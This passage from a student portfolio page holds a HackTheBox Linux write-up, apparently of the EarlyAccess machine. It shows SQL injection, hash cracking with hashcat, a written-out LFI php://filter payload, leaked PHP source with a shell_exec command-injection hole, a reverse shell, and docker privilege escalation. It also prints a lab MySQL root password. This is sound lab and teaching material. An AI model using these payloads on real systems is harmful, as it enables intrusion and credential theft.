          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
